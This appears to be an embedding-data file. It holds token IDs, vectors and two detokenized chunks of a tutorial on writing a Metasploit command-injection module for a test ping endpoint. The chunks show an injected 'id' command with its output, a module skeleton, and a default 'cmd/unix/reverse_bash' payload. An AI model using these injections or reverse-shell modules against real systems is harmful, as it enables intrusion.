1010, 2051, 1014, 5244, 19387, 2102, 8117, 1013, 20704, 2290, 1013, 4098, 1013, 9108, 6777, 1027, 2385, 1012, 6421, 2683, 1013, 2385, 1012, 6421, 2683, 1013, 2385, 1012, 6421, 2683, 1013, 1014, 1012, 2199, 5796, 3231, 2008, 2115, 4646, 2003, 18077, 3085, 1011, 2036, 2007, 15390, 1024, 1002, 15390, 2334 ]
metasploit
109.txt
0
##host : 8000 / ping? ip = 1. 1. 1. 1 % 20 % 26 % 26id ping 1. 1. 1. 1 ( 1. 1. 1. 1 ) 56 ( 84 ) bytes of data. 64 bytes from 1. 1. 1. 1 : icmp _ seq = 1 ttl = 58 time = 16. 6 ms - - - 1. 1. 1. 1 ping statistics - - - 1 packets transmitted, 1 received, 0 % packet loss, time 0ms rtt min / avg / max / mdev = 16. 614 / 16. 614 / 16. 614 / 0. 000 ms uid = 1000 ( meta ) gid = 1000 ( meta ) with this output uid = 1000 ( meta ) gid = 1000 ( meta ), we know that the id command successfully executed on the target system. now that we have a vulnerable application we can write a module to pwn it. the structure of a moduleto have a functioning command injection metasploit module we need a few things : create a subclass of msf : : exploit : : remoteinclude the msf : : exploit : : remote : : httpclient mixindefine three methods : initialize, which defines metadata for the moduleexecute _ command, which is what runs the command against the remote serverexploit, wraps execute _ command, and can handle some logic when we move to a cmdstager module ( not required, but recommended ) a method to substitute or escape bad characters, to be used inside execute _ command. this could also just be done inside execute _ command instead of a separate function call. where to put a modulemetasploit looks for custom modules at $ home /. msf4 / modules, but the way you get modules there varies based on how you ’ re running metasploit. if you have a full install of metasploit on your host, you can just add your custom module to $ home /. msf4 / modules / exploits / custom _ mod. rb. you can also just add a module to metasploit ’ s modules folder - this can be helpful when troubleshooting, but it ’ s not recommendeddocker if you ’ re using the docker image, you can also add modules to $ home /. msf4 / modules and that folder will be mounted as a volume inside the docker containeryou can also change the
[ 0.03293190896511078, -0.3494398593902588, -0.8363758325576782, 0.6899474859237671, -0.16724793612957, 0.18659205734729767, -0.42466282844543457, 0.39737197756767273, 0.6975322961807251, 0.7532263994216919, 0.16465279459953308, 0.1317456215620041, 0.09544151276350021, -0.49664491415023804, -0.39735621213912964, 0.16783849895000458, -0.19870299100875854, -0.2828361988067627, -1.2042113542556763, 0.2962672710418701, 0.1944691687822342, -0.025433575734496117, -0.905479371547699, -0.8429040312767029, -0.3749646842479706, 0.06648283451795578, 0.20448967814445496, -0.14737364649772644, 0.3410562574863434, 0.21879491209983826, 0.7318434715270996, -0.5538642406463623, -0.11409557610750198, -0.32783564925193787, 0.4231880307197571, 0.1298893243074417, 0.44184252619743347, -0.23206473886966705, 0.2129942625761032, -0.545332670211792, 0.5767431259155273, -0.4704371988773346, -0.28667399287223816, -0.38457804918289185, -0.1388206034898758, -0.2615695297718048, 0.8305363655090332, -0.39250144362449646, 1.2633310556411743, -0.18704009056091309, 0.47141367197036743, 0.49128371477127075, -0.24881742894649506, 0.28028443455696106, -0.11690057069063187, -0.09271290898323059, -0.3228606581687927, -0.20659597218036652, -0.2042890340089798, 0.2288404405117035, -0.2192419469356537, -0.059152666479349136, 0.0812920331954956, -0.7813294529914856, 0.00024729038705118, 0.18602396547794342, -0.06805309653282166, -0.09403149783611298, -0.5477126836776733, -0.5317507982254028, -0.3774878680706024, 0.1202496662735939, -0.27162349224090576, -0.24153611063957214, -0.8385943174362183, 0.25193193554878235, 0.3776730000972748, -0.8261797428131104, -0.32530122995376587, 0.4225861430168152, -0.6132477521896362, 0.7466363906860352, -0.22119462490081787, -0.4245658814907074, -0.2544945478439331, -0.18391862511634827, 0.6108338236808777, 0.8688936233520508, -0.3517870008945465, 0.35004308819770813, 0.5365520715713501, 0.49953141808509827, -0.3589102327823639, -0.35880914330482483, 0.3435457944869995, 0.5656933784484863, 0.1944545954465866, 0.062066398561000824, -0.00936068594455719, -0.4802421033382416, 0.6538835167884827, 0.9829065203666687, 0.11198060214519501, 0.5515169501304626, 0.08603578060865402, 0.543339192867279, 0.24332931637763977, -0.3327223062515259, 0.16903041303157806, -0.06928499042987823, 0.5553098917007446, 0.11814551055431366, 0.1829022765159607, -0.2461862564086914, -0.5703112483024597, 0.2215520590543747, 0.35554239153862, -0.21705983579158783, -0.10583820194005966, 1.300116777420044, -0.4853562116622925, -0.6262893676757812, 0.2751118838787079, -0.27666980028152466, 0.2990693747997284, -0.5388303995132446, -0.34914690256118774, 0.5874648094177246, -0.27239230275154114, -0.5698384642601013, -0.4515194594860077, -0.04575774818658829, 0.30077046155929565, 0.8175910115242004, -0.2219824194908142, 0.3588113486766815, -0.12914830446243286, 0.3209545612335205, 1.0582958459854126, -0.7459284663200378, -0.09696725010871887, 0.4516211748123169, 0.0649799183011055, 1.1276594400405884, 0.4039532244205475, 0.24867132306098938, -0.3314269185066223, -0.13509786128997803, -0.11684630811214447, 0.06695152819156647, -0.5022062659263611, -0.315739244222641, 0.6742429137229919, 0.23110945522785187, -0.46912625432014465, 0.14231064915657043, -0.062160808593034744, 0.7081182599067688, -0.2692621946334839, 0.03225408121943474, -0.009521108120679855, 0.7788031697273254, 0.13710859417915344, -0.018590278923511505, -0.4591321349143982, 0.324461430311203, -0.7302294373512268, -0.37403079867362976, -0.7360818982124329, 0.021850038319826126, 0.5498247146606445, 0.07236012071371078, -0.03971979394555092, 0.14345115423202515, 1.2079232931137085, 0.8716201782226562, -0.5338163375854492, -0.33989956974983215, 0.5494401454925537, 0.35647380352020264, -1.1405248641967773, 0.24556826055049896, -0.3973895013332367, 0.8601683974266052, 0.5773518681526184, 0.3301711082458496, -0.03890872374176979, -1.0102298259735107, 0.23320262134075165, -0.04264075681567192, -0.05805151164531708, 0.6320148706436157, -0.10536536574363708, 0.29799389839172363, 0.610977828502655, 0.34631070494651794, -0.7349051237106323, 0.31162649393081665, -0.15122036635875702, -1.2448325157165527, -0.6332388520240784, 0.5185516476631165, -0.1533997505903244, 0.16386543214321136, -0.1504461020231247, -0.27270573377609253, 0.4934646189212799, 0.6491172909736633, -0.5085689425468445, 0.5984057188034058, 0.7892100214958191, -0.14059481024742126, -0.21750307083129883, -0.2089773565530777, 0.16592289507389069, 0.1764131635427475, -0.5602407455444336, 0.603226363658905, -0.08827559649944305, -0.08369410783052444, 0.04893242195248604, 0.3013421595096588, 0.4756613075733185, 0.010946615599095821, -0.09355238080024719, -0.9424741864204407, -0.007112625055015087, 0.19075509905815125, -0.48545223474502563, -0.06094706058502197, -0.3125745356082916, 0.3470310866832733, -0.10939659178256989, 1.0855844020843506, 0.041673555970191956, -0.4006195366382599, 0.3522515594959259, 0.3472882807254791, -0.4174010157585144, -0.01758788339793682, 0.16181623935699463, 1.0026884078979492, 0.2439441829919815, 0.3209192156791687, 0.19820581376552582, 0.3628368079662323, 0.14316710829734802, -0.06365926563739777, 0.22595366835594177, 0.12075382471084595, -0.5142855644226074, 0.6377794146537781, 0.48681557178497314, -0.3270801901817322, -0.5955222249031067, -0.5689347982406616, 0.8381232619285583, 0.8297665119171143, -0.6166495680809021, -0.17267994582653046, -0.007161787711083889, -0.34744396805763245, -0.8476911783218384, -0.281728595495224, -0.11452548950910568, 0.8780445456504822, -0.19271701574325562, 0.14546990394592285, 0.11836878955364227, -0.13984321057796478, -1.0754753351211548, 0.09036334604024887, -0.7508623600006104, -0.30354759097099304, -0.40121835470199585, -0.11756912618875504, -0.09951882809400558, 0.1109829694032669, 0.3645760715007782, -0.504982054233551, -0.6240257024765015, 0.1085662692785263, 0.12863683700561523, 0.4887683093547821, 0.13619358837604523, -0.4917658567428589, -0.764220654964447, 0.356371134519577, -0.2042042762041092, 0.5672809481620789, -0.221010223031044, -0.20338185131549835, -0.4273799955844879, 0.06539582461118698, -0.25229412317276, -0.33286556601524353, 1.067693829536438, 0.06228739023208618, 0.33811160922050476, 0.02709968388080597, 0.14434613287448883, -0.06804513931274414, 0.5847126245498657, -0.1767892688512802, -0.5930995941162109, 0.19017398357391357, -0.16402319073677063, -0.09924755990505219, 0.5303476452827454, 0.2947632372379303, -0.6796193718910217, 0.5866066217422485, 0.088938869535923, 0.2382068783044815, -0.5592617988586426, 0.5250186920166016, 0.15620043873786926, -0.32749122381210327, 0.18331946432590485, -0.32868051528930664, 0.18708831071853638, 0.0018115811981260777, -0.32030999660491943, 0.23854009807109833, -0.21929043531417847, 0.04638398066163063, 0.02745823562145233, -0.6950565576553345, 0.20325477421283722, -0.10107281804084778, -0.16041713953018188, -0.04024273157119751, -0.5148995518684387, 0.5253381729125977, 0.06779363006353378, 0.06572606414556503, -0.63800448179245, -0.5660721063613892, 0.1630672961473465, 0.1384945660829544, -0.1961001455783844, -0.7478846311569214, 0.38242536783218384, 0.6383420825004578, -0.0074627576395869255, 0.4634953737258911, 0.6385257840156555, -0.4044894874095917, -0.31641367077827454, -0.09680715203285217, -0.1353198140859604, 0.17466048896312714, 0.16379959881305695, 0.6917984485626221, 0.5004327893257141, 1.0841416120529175, -0.4024345874786377, -0.4024747610092163, 0.7898028492927551, -0.04583190008997917, 0.20538078248500824, -0.3145410418510437, -0.06543231010437012, 0.13578684628009796, -0.562990128993988, -0.14590410888195038, 0.02323145419359207, -0.013393108732998371, 0.11071372032165527, -0.17963923513889313, 0.6828833818435669, 0.09466269612312317, -0.008722715079784393, 0.5687152743339539, -0.13403348624706268, -0.3679308295249939, 0.8396223187446594, -0.13420633971691132, 0.62635338306427, -0.48563262820243835, 0.0868883952498436, 0.2915518581867218, 0.1451636701822281, 0.3879167139530182, 0.05089516192674637, -0.044917233288288116, -0.41420429944992065, -0.48320311307907104, 0.28046900033950806, -0.35505014657974243, -0.04998168349266052, 0.20369984209537506, 0.013653743080794811, -0.6709083318710327, -1.089825987815857, -0.6968809962272644, 0.3440890610218048, 1.0470811128616333, 0.9270796775817871, 0.7073124647140503, 0.28395622968673706, -0.5896691679954529, -0.491264283657074, 0.2015284150838852, -0.35270988941192627, 0.6021682620048523, 0.08558410406112671, 0.7365266680717468, 0.10056684911251068, 0.4228276014328003, -0.44261544942855835, 0.39311906695365906, -0.16441422700881958, -0.3547942340373993, -0.23203647136688232, 0.14693644642829895, -0.31065142154693604, -0.018590101972222328, 0.3798467814922333, 0.1340203732252121, -0.0046196794137358665, -0.8096262812614441, -0.3090641498565674, 0.5742727518081665, 0.0910191759467125, -0.8244774341583252, -0.6087884306907654, -0.4545280933380127, 0.23687103390693665, 0.09565981477499008, -0.49274739623069763, -0.01819355972111225, -0.5495481491088867, -0.14088256657123566, -0.7629016041755676, -0.012952938675880432, 0.3279123604297638, -0.12325778603553772, -0.14405584335327148, -0.6860724091529846, -0.17471428215503693, 0.26615744829177856, -0.130355104804039, -0.679078221321106, -0.10102028399705887, 0.05121525377035141, 0.2884189486503601, 0.30590251088142395, -0.5212153196334839, -0.31357088685035706, -0.08268267661333084, -0.45350736379623413, 0.32661861181259155, -0.6877341270446777, 0.22340112924575806, 0.3258648216724396, -0.18567635118961334, 0.14936695992946625, 0.13634678721427917, -0.6336112022399902, -0.26882240176200867, -0.4211350679397583, 0.5380018949508667, -0.05285146087408066, 0.169277161359787, 0.8140074610710144, -0.646538257598877, -0.16999095678329468, 0.46945837140083313, 0.22033992409706116, -0.027117351070046425, -0.0353495292365551, -0.16827191412448883, -0.7475133538246155, 0.47986066341400146, -0.4051932692527771, 0.6304314136505127, 0.17966389656066895, 0.6442843079566956, 0.26644256711006165, -0.666385293006897, 0.9430716633796692, 0.5743644833564758, 0.3241958022117615, -1.1479696035385132, -0.6189286112785339, 0.3009270131587982, 0.7618475556373596, -0.25350984930992126, 0.26943063735961914, -0.4093181788921356, -0.640987753868103, -0.1111728698015213, -0.2372060865163803, -0.7780016660690308, -0.7489280104637146, -0.042504798620939255, 0.17602874338626862, -0.3885100483894348, -0.25237250328063965, 0.09338230639696121, -0.5798671245574951, -1.0500268936157227, 0.36885780096054077, -0.7581389546394348, -0.08494207262992859, -0.44329243898391724, 0.1213412955403328, -0.6927064657211304, 0.19075238704681396, -0.7224928736686707, 0.16970807313919067, -0.5378438830375671, 0.4433750808238983, -0.006806783843785524, 0.10580586642026901, 0.18573302030563354, -0.17754626274108887, 0.027736365795135498, 0.08148758113384247, -0.3856998085975647, -0.6001625657081604, 0.07248184084892273, 0.8677419424057007, -0.221091628074646, 0.06576228141784668, -0.14055773615837097, -0.8073691725730896, -0.690978467464447, -0.850117564201355, 0.16262076795101166, 0.06408673524856567, 0.014437112957239151, -0.4571687579154968, -0.8138235211372375, -0.3254672586917877, -0.0007186816073954105, 0.20046019554138184, -0.9690393209457397, 0.01758032664656639, -0.14055272936820984, -0.2593569755554199, -0.3023069202899933, 0.0631687343120575, -0.19295912981033325, -0.803847074508667, -0.2859177887439728, 0.5970741510391235, 0.2453325092792511, -0.010070200078189373, -0.4612707793712616, 0.10038713365793228, 0.19676916301250458, 0.21240778267383575, -0.40631213784217834, -0.32760146260261536, -0.27847638726234436, -0.16087931394577026, -0.06417864561080933, 0.5188450217247009, -0.44730883836746216, 0.7590279579162598, -0.7366925477981567, -0.11038878560066223, -0.016268910840153694, -0.03137503191828728, 0.10427597165107727, 0.10462334007024765, 0.5518447160720825, -0.340453565120697, 0.5470013618469238, -0.2345733642578125, 0.4148859679698944, -0.10453401505947113, -0.14009200036525726, -0.9216025471687317, 0.03940857946872711, -0.8448086977005005, -0.9942592978477478, 0.5272020697593689, 0.07095237821340561, -0.6464235186576843, 0.36577108502388, 0.004759492818266153, 0.5657784342765808, -0.626448392868042, 0.6631901264190674, 0.9346176981925964, 0.07800120115280151, 0.49011680483818054, -0.7706800699234009, 0.17502477765083313, 0.37540820240974426, 0.28436774015426636, 0.4423484206199646, 0.4174087345600128, 0.0055396705865859985, -0.017867807298898697, -0.4491676688194275, 0.047785740345716476, -0.3183138370513916, -0.3580329120159149, 0.40904444456100464, -0.13057096302509308, 0.31382983922958374, -0.12208319455385208, -0.5752090811729431, -0.38298386335372925, 0.5427168011665344, -0.289650022983551, -0.2727738320827484, 0.3546319603919983, 0.9044733047485352, 0.3399450480937958, -0.7341028451919556, 0.7150394916534424, -0.3201287090778351, -0.0574340857565403, 0.35808080434799194, 0.5278417468070984, -0.6193600296974182, 1.3366355895996094, 0.33323895931243896, -0.8432457447052002, -0.29069021344184875, -0.5119304060935974, -0.2697910666465759, -0.15319031476974487, -0.08547904342412949, -0.5141826272010803, 0.17592467367649078, 0.12606072425842285, 0.0037472685799002647, 0.32025524973869324, -0.38836318254470825, 0.1382107436656952, -0.8370023369789124, 0.6251859664916992, -0.2905372381210327, 0.4423910975456238, 0.4655151963233948, -0.44987747073173523, -0.08424995839595795, -0.9662755727767944, -0.7467284798622131, 0.3976713716983795, 0.4922401010990143, 0.5524302124977112, -0.28497251868247986, 0.6229571104049683, -0.20748695731163025, 0.46896854043006897, 0.2791602909564972, -0.13437707722187042, 0.421301931142807, 1.0023601055145264, -0.3011038303375244, -0.7987304925918579, -0.6135357022285461, -0.13560917973518372, -0.1581052988767624, 0.7594525218009949, 0.37897711992263794, -0.14016684889793396, 0.4241502285003662, 0.11912678927183151, -0.2934516370296478, -0.7295441031455994, -0.9558274745941162, -0.770390510559082, -0.36564871668815613, 0.0848841592669487, -0.1693500280380249, -0.41821515560150146, -0.17100347578525543, -0.17154277861118317, -0.5569369792938232, -0.7802404761314392, 0.3237457871437073, 0.11839651316404343, -0.27975955605506897, -0.5077859163284302, 0.17541387677192688, -0.9511878490447998, -0.6366845369338989, -0.6049699187278748, 0.5221845507621765, -0.679635763168335, -0.595262348651886, -0.34393587708473206, 0.12989574670791626, -0.31029361486434937, 0.7027247548103333, -0.33733507990837097, -0.38770461082458496, -0.25080224871635437, -0.9166460633277893, 0.23905731737613678, 0.34154587984085083, -0.6791762113571167, 0.38510096073150635, 0.088575579226017, -0.30759814381599426, 0.7104219198226929, -0.5831190943717957, 0.3255126476287842, -0.4046371579170227, 0.18595771491527557, 0.4337606728076935, -0.08550374209880829, -0.8541214466094971, 0.012992520816624165, 0.005967686418443918, -0.27849242091178894, 0.13403917849063873, -0.6278318762779236, 0.08613087981939316, 0.020283661782741547, -0.12802815437316895, 0.17994996905326843, 1.0594756603240967, 0.3709104061126709, 0.38479986786842346, -0.57476806640625, 0.6874181628227234, 0.3368161916732788, 0.04772963002324104, -0.13872532546520233, 0.3559717535972595, -0.10372902452945709, -0.8122735023498535, 0.5065249800682068, 0.466552197933197, -0.6261655688285828, 0.6889826655387878, -0.08126755058765411, -0.09966019541025162, -0.291582852602005, -0.26699334383010864, -0.2170930951833725, 0.2254183441400528, 0.434216171503067, 0.3167971670627594, 0.4170878827571869, -0.037119969725608826, -0.577707052230835, -0.42832133173942566, -1.3922462463378906, 0.10684111714363098, 0.24913690984249115, -0.4866991341114044, -0.25479304790496826, -0.43692830204963684, -0.5084692239761353, -0.4479096531867981, 0.13970479369163513, 0.17280213534832, 0.28469228744506836, -0.13088896870613098, 0.4796416759490967, 1.18467116355896, -0.5186095237731934, -0.4056212604045868, 0.09656266123056412, 0.4663953185081482, -1.029492974281311, -1.2452179193496704, 0.13200250267982483, 0.8710352182388306, 0.11810096353292465, -0.1458229124546051, -0.46294620633125305, 0.16422462463378906, 0.3555200695991516, 0.04680021479725838, -0.3510633707046509, 0.27426478266716003, -0.35543015599250793, 0.11067064106464386, -0.38735297322273254, 0.581863284111023, -0.3480609953403473, -0.6148254871368408, 0.2550541162490845, -0.15880168974399567, -0.5309136509895325, 0.31798049807548523, 0.14828036725521088, -0.027096280828118324, 0.7721327543258667, 0.7986169457435608, 0.12132048606872559, -0.46442854404449463, 0.21605919301509857, -0.528203547000885, 0.07290221750736237, 0.5823137164115906, 0.7268226742744446, -0.03713427484035492, 0.2404877096414566, 0.490106999874115, -0.8852152228355408, -0.028473129495978355, 0.7799192667007446, 0.27613624930381775, -0.3276548683643341, 0.4012523293495178, -0.9516516923904419, 0.5117785930633545, -0.2694268226623535, -0.015815986320376396, 0.28717148303985596, 0.36658820509910583, 0.3128258287906647, 0.34225350618362427, -0.32159310579299927, 0.20388853549957275, -0.5624629259109497, 0.2657166123390198, -0.008183177560567856, 0.1900356560945511, -0.0875634178519249, 0.14867980778217316, -0.6308388710021973, -0.14500010013580322, 0.8952459096908569, 0.652400016784668, -0.48946014046669006, 0.09567714482545853, -0.25824761390686035, 0.44101616740226746, 0.1403038054704666, -0.3449561595916748, -0.3670768141746521, 0.0044321054592728615, -0.18265795707702637, -0.2826154828071594, -0.27673542499542236, 0.49149271845817566, 0.18229886889457703, -0.16532522439956665, 0.2091514766216278, 0.4554404616355896, 0.10347041487693787, -0.3139914870262146, 0.444553017616272, -0.24659910798072815, 0.009052405133843422, 0.1890232115983963, -0.15790784358978271, -0.37143173813819885, 0.9067990779876709, 0.2874763309955597, 0.5586323142051697, 0.2527463138103485, 1.1783469915390015, 0.16429252922534943, 0.7772326469421387, 0.791285514831543, -0.4437015950679779, -0.19117847084999084, -0.03795700520277023, -0.1534019261598587, -0.16616381704807281, 0.4327544867992401, -0.18879210948944092, 0.6012781858444214, -0.3126322329044342, -0.3083063066005707, -0.10776776820421219, 0.27768123149871826, -0.4330296814441681, -0.015813468024134636, 0.7208108901977539, 0.036171890795230865, -0.2885380685329437, -0.33482375741004944, 0.7034333348274231, 0.6675586104393005, 0.782637894153595, 0.20294474065303802, -0.8257650136947632, -0.39828625321388245, 0.0925375446677208, -0.11694285273551941, 0.5752010345458984, -0.049202341586351395, -0.3107856512069702, -0.06997105479240417, -0.6832199692726135, -0.304656445980072, 0.2833416163921356, -0.2917235791683197, -0.36769890785217285, 0.5054652094841003, 0.4838501214981079, 0.908989429473877, 0.27277955412864685, 0.13191504776477814, -0.7507832646369934, -0.10361004620790482, 0.7212480306625366, -0.007664951961487532, 0.4322783946990967, 0.5947908163070679, 0.27237507700920105, 0.22886765003204346, -0.09070298075675964, 0.13639941811561584, -0.3367491066455841, 0.19454309344291687, -0.08939477056264877, 0.09022802114486694, -0.6252134442329407, -0.3338438868522644, 0.032012686133384705, -0.021918606013059616, 0.6768154501914978, 0.25161048769950867, -0.7954802513122559, -0.4951557219028473, -0.3283021152019501, 0.19675897061824799, -0.35323163866996765, 0.3183310627937317, 0.08668576925992966, -0.6103212833404541, 0.6190993189811707, -0.7426968812942505, 4.567366123199463, 0.3185841143131256, 0.10487885773181915, -0.03117005154490471, -0.15268656611442566, 0.33164048194885254, 0.6673133373260498, -0.28805360198020935, 0.6891029477119446, -0.549639880657196, 0.146328404545784, -0.01326693780720234, 0.5841416120529175, 1.0399404764175415, 0.6784915328025818, 0.3780475854873657, -0.42984744906425476, -0.013399278745055199, 0.4904932677745819, -0.7915137410163879, -0.919241189956665, -0.28143712878227234, -0.15968602895736694, 1.6331114768981934, 0.37361931800842285, -0.09787013381719589, 0.1809949427843094, -0.8216499090194702, 0.2123533934354782, -0.10690852254629135, 0.004079131409525871, -0.41543442010879517, 0.07754628360271454, -0.24847224354743958, -0.574977695941925, -0.2695859968662262, -0.31689172983169556, -0.6990258097648621, -0.38813236355781555, -0.24420031905174255, 0.7592208981513977, 0.12439746409654617, -0.2974846363067627, -0.0531979463994503, -0.046368423849344254, 0.5397536754608154, -0.702298641204834, 0.5026141405105591, 0.849010705947876, -0.7867885828018188, 0.3421348035335541, -0.18015673756599426, 1.1152395009994507, 0.5848134160041809, -0.974088191986084, 0.4276226758956909, -0.05536530539393425, -0.4084056615829468, -0.004083374049514532, 0.4978988468647003, 0.3265383243560791, -0.634971022605896, 0.2582630217075348, -0.19670934975147247, -0.19826628267765045, 0.17804767191410065, -0.1435474306344986, -0.007954681292176247, -0.006622003391385078, 0.16438673436641693, 0.08100931346416473, -0.0784400999546051, -0.5410352945327759, -0.3441675305366516, 0.9047695398330688, 0.2283109426498413, -0.23254773020744324, -0.13065490126609802, 0.6056305766105652, -0.0857192724943161, -0.41152423620224, -0.49779587984085083, -0.8724286556243896, 0.43469858169555664, 0.17601723968982697, 0.5685892105102539, -0.1993274986743927, -0.807019054889679, 0.17516884207725525, 0.3325135111808777, 0.2814086675643921, 0.5870847105979919, -0.5275706052780151, 0.5178310871124268, 0.054942406713962555 ]
[ 15006, 2102, 1024, 5385, 2692, 1013, 17852, 1029, 12997, 1027, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1003, 2322, 1003, 2656, 1003, 2656, 3593, 17852, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1006, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1007, 5179, 1006, 6391, 1007, 27507, 1997, 2951, 1012, 4185, 27507, 2013, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1024, 24582, 8737, 1035, 7367, 4160, 1027, 1015, 23746, 2140, 1027, 5388, 2051, 1027, 2385, 1012, 1020, 5796, 1011, 1011, 1011, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 17852, 6747, 1011, 1011, 1011, 1015, 23730, 11860, 1010, 1015, 2363, 1010, 1014, 1003, 14771, 3279, 1010, 2051, 1014, 5244, 19387, 2102, 8117, 1013, 20704, 2290, 1013, 4098, 1013, 9108, 6777, 1027, 2385, 1012, 6079, 2549, 1013, 2385, 1012, 6079, 2549, 1013, 2385, 1012, 6079, 2549, 1013, 1014, 1012, 2199, 5796, 21318, 2094, 1027, 6694, 1006, 18804, 1007, 21025, 2094, 1027, 6694, 1006, 18804, 1007, 2007, 2023, 6434, 21318, 2094, 1027, 6694, 1006, 18804, 1007, 21025, 2094, 1027, 6694, 1006, 18804, 1007, 1010, 2057, 2113, 2008, 1996, 8909, 3094, 5147, 6472, 2006, 1996, 4539, 2291, 1012, 2085, 2008, 2057, 2031, 1037, 8211, 4646, 2057, 2064, 4339, 1037, 11336, 2000, 1052, 7962, 2009, 1012, 1996, 3252, 1997, 1037, 11336, 3406, 2031, 1037, 12285, 3094, 13341, 18804, 13102, 4135, 4183, 11336, 2057, 2342, 1037, 2261, 2477, 1024, 3443, 1037, 4942, 26266, 1997, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 2378, 20464, 12672, 1996, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 8299, 20464, 11638, 4666, 22254, 12879, 3170, 2093, 4725, 1024, 3988, 4697, 1010, 2029, 11859, 27425, 2005, 1996, 11336, 10288, 8586, 10421, 1035, 3094, 1010, 2029, 2003, 2054, 3216, 1996, 3094, 2114, 1996, 6556, 8241, 10288, 24759, 28100, 1010, 19735, 15389, 1035, 3094, 1010, 1998, 2064, 5047, 2070, 7961, 2043, 2057, 2693, 2000, 1037, 4642, 5104, 26702, 2099, 11336, 1006, 2025, 3223, 1010, 2021, 6749, 1007, 1037, 4118, 2000, 7681, 2030, 4019, 2919, 3494, 1010, 2000, 2022, 2109, 2503, 15389, 1035, 3094, 1012, 2023, 2071, 2036, 2074, 2022, 2589, 2503, 15389, 1035, 3094, 2612, 1997, 1037, 3584, 3853, 2655, 1012, 2073, 2000, 2404, 1037, 11336, 11368, 3022, 24759, 28100, 3504, 2005, 7661, 14184, 2012, 1002, 2188, 1013, 1012, 5796, 2546, 2549, 1013, 14184, 1010, 2021, 1996, 2126, 2017, 2131, 14184, 2045, 9783, 2241, 2006, 2129, 2017, 1521, 2128, 2770, 18804, 13102, 4135, 4183, 1012, 2065, 2017, 2031, 1037, 2440, 16500, 1997, 18804, 13102, 4135, 4183, 2006, 2115, 3677, 1010, 2017, 2064, 2074, 5587, 2115, 7661, 11336, 2000, 1002, 2188, 1013, 1012, 5796, 2546, 2549, 1013, 14184, 1013, 20397, 1013, 7661, 1035, 16913, 1012, 21144, 1012, 2017, 2064, 2036, 2074, 5587, 1037, 11336, 2000, 18804, 13102, 4135, 4183, 1521, 1055, 14184, 19622, 1011, 2023, 2064, 2022, 14044, 2043, 13460, 23416, 2075, 1010, 2021, 2009, 1521, 1055, 2025, 6749, 14647, 2121, 2065, 2017, 1521, 2128, 2478, 1996, 8946, 2121, 3746, 1010, 2017, 2064, 2036, 5587, 14184, 2000, 1002, 2188, 1013, 1012, 5796, 2546, 2549, 1013, 14184, 1998, 2008, 19622, 2097, 2022, 5614, 2004, 1037, 3872, 2503, 1996, 8946, 2121, 11661, 29337, 2064, 2036, 2689, 1996 ]
metasploit
109.txt
1
mount point by modifying the docker - compose filefor testing, the easiest thing to do is the simplest. you can find metasploit ’ s exploit directory, copy a file, rename it, and go from there. a shell of a modulethe shell of a module that follows the above format is something like this : class metasploitmodule < msf : : exploit : : remote rank = goodranking include msf : : exploit : : remote : : httpclient def initialize ( info = { } ) # empty for now end def filter _ bad _ chars ( cmd ) # empty for now end def execute _ command ( cmd, _ opts = { } ) # empty for now end def exploit # empty for now end end this covers every essential point from the structure of a module, although it won ’ t run yet. initializethe initialize method is used to define and pass metadata. every initialize method in the metasploit - framework codebase follows the format of an empty info being passed into update _ info, which gets passed to the msf : : exploit : : remote initialize method : def initialize ( info = { } ) super ( update _ info ( info, # here is where the metadata goes'name'= >'command injection against a test ping endpoint ','description'= >'this exploits a command injection vulnerability against a test application ','license'= > msf _ license,'author'= >'your name ','references'= > [ ['url ','https : / / metasploit. com /'] ],'disclosuredate'= >'2023 - 08 - 04 ','platform'= >'linux ', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp'targets'= > ['unix command ', {'platform'= > ['linux ','unix'], # linux and unix have different cmd payloads, this gives you more options'arch'= > arch _ cmd,'type'= > : unix _ cmd, # running a command - this would be ` : linux _ dropper ` for a cmdstager dropper'defaultoptions'= > {'payload'= >'cmd / unix / reverse _ bash ','rport'= > 8000
[ 0.09228631108999252, -0.4979366660118103, 0.002671685302630067, 0.3223211169242859, -0.4329723119735718, -0.17838110029697418, -0.6167254447937012, -0.14519403874874115, 0.4960714280605316, 0.41457074880599976, 0.7272017598152161, -0.06738070398569107, 0.24730075895786285, -0.6976436972618103, -0.21774177253246307, 0.004946026485413313, -0.13009391725063324, -0.20359575748443604, -1.0170594453811646, 0.27059444785118103, 0.3170360326766968, -0.2742508053779602, -0.9479956030845642, -0.737973690032959, -0.3928252160549164, 0.28814777731895447, 0.35202330350875854, -0.14246222376823425, 0.3022006154060364, 0.339264452457428, 0.5521867275238037, 0.08032256364822388, 0.03664993867278099, -0.2445400506258011, 0.5218828916549683, -0.40361887216567993, 0.6091023087501526, -0.38901060819625854, 0.17010124027729034, -0.5711472034454346, 0.14792123436927795, -0.5628226399421692, 0.031376712024211884, -0.26117143034935, -0.3529987931251526, -0.23378880321979523, 0.5323320627212524, -0.0721888393163681, 0.22404585778713226, -0.16701547801494598, 0.7224039435386658, 0.642463743686676, 0.41503700613975525, 0.3864288926124573, 0.16514259576797485, -0.22501413524150848, -0.35016703605651855, 0.1769367754459381, -0.3815273642539978, 0.30877435207366943, -0.041991736739873886, 0.7686770558357239, -0.1477978676557541, -0.6699159741401672, -0.004530483856797218, 0.534046471118927, -0.1526481658220291, -0.26707759499549866, -0.2940737307071686, -0.38510453701019287, -0.4648929238319397, 0.3647126257419586, -0.6411018967628479, -0.5090876221656799, -0.41322949528694153, -0.033553946763277054, 0.5732954740524292, -0.48552587628364563, -0.5944060683250427, 0.8114961385726929, -0.4127442538738251, 0.8437734842300415, 0.35796263813972473, -0.3961496353149414, -0.020322080701589584, -0.49334946274757385, 0.5694115161895752, 0.8811246752738953, -0.38093358278274536, 0.1750296652317047, 0.5625225305557251, 0.4114624559879303, -0.3361992835998535, -0.21114902198314667, -0.13685809075832367, 0.5804993510246277, -0.348086953163147, 0.38261571526527405, 0.16854752600193024, -0.08657800406217575, 0.5434110760688782, 0.7611147165298462, 0.0035576093941926956, 0.024237848818302155, -0.14483605325222015, 0.5202702283859253, 0.34689828753471375, 0.2677019536495209, 0.16240505874156952, 0.09475976228713989, 0.5502431392669678, 0.24736861884593964, -0.11700248718261719, -0.7796778678894043, -0.26014840602874756, 